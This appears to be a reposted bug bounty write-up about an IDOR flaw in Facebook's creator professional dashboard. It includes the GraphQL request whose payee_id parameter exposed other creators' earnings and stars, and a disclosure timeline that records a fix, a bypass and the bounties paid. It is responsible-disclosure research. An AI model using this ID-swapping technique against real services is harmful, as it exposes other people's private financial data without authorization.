Unauthorized access to Facebook creator’s professional dashboard

8 months ago 55
BOOK THIS SPACE FOR AD
ARTICLE AD

Gtm Mänôz

Just after returning home from Bounty Con Singapore, I had to fly India in Mid-Oct 2022 for some family reasons. While staying there, my personal Facebook account had met the eligibility criteria of country location for the star monetization.

On the midnight of 30th Oct, 2022, I applied to star monetization for my personal Facebook account in order to explore the monetization section of the professional dashboard. Just after 30 minutes of exploring star monetization, I was able to view any Facebook creator’s estimated earnings, total stars received and earnings restriction due to violation of monetization policies.

Request:

POST /graphql HTTP/2
Host: graph.facebook.com
-other headers-

client_doc_id=10537346114216466748965519952
{"params":{"is_on_load_actions_supported":true,"params":"{params:{\"server_params\":{\"subtype\":\"GTW\",\"payee_id\":\"pageID\",\"entrypoint\":\"MGMT_ADD_PAYOUT_NOTIFICATION\",\"client_extra\":{\"product_type\":\"stars\"},\"exit_destination\":\"deferred_onboarding_notifications\",\"hide_tabbar\":true},\"client_input_params\":{}},}","bloks_versioning_id":"Some_Value_1","app_id":"com.bloks.www.payout_onboarding"},"scale":"2","nt_context":{"styles_id":"Some_Value_2","using_white_navbar":true,"pixel_ratio":2,"is_push_on":true,"bloks_version":"Some_Value_3"}}

where, the parameter payee_id=pageID was vulnerable to IDOR which discloses the estimated earnings, total stars received and earnings restriction of other Facebook creators.

Unauthorized access to any Facebook creator’s professional dashboard

30 Oct, 2022 — Report sent to Facebook.1 Nov, 2022 — Triaged.3 Nov, 2022 — Bounty awarded by Facebook.8 Nov, 2022 — Fixed.15 Dec, 2022 — Bypass sent.19 Dec, 2022 — Double bounty awarded by Facebook30 Jan-25 Oct, 2023 — Asked for update.25 Oct, 2023 — Got replied that the issue was mitigated during the month of March but never got fix message during that time.
Read Entire Article